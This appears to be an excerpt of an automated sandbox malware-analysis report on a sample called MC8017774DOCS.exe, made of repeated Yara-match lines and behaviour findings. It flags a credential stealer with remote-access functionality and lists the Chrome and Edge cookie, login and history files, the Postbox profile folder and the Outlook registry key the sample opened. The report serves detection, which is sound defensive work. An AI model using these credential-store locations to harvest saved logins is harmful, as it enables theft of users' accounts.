Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR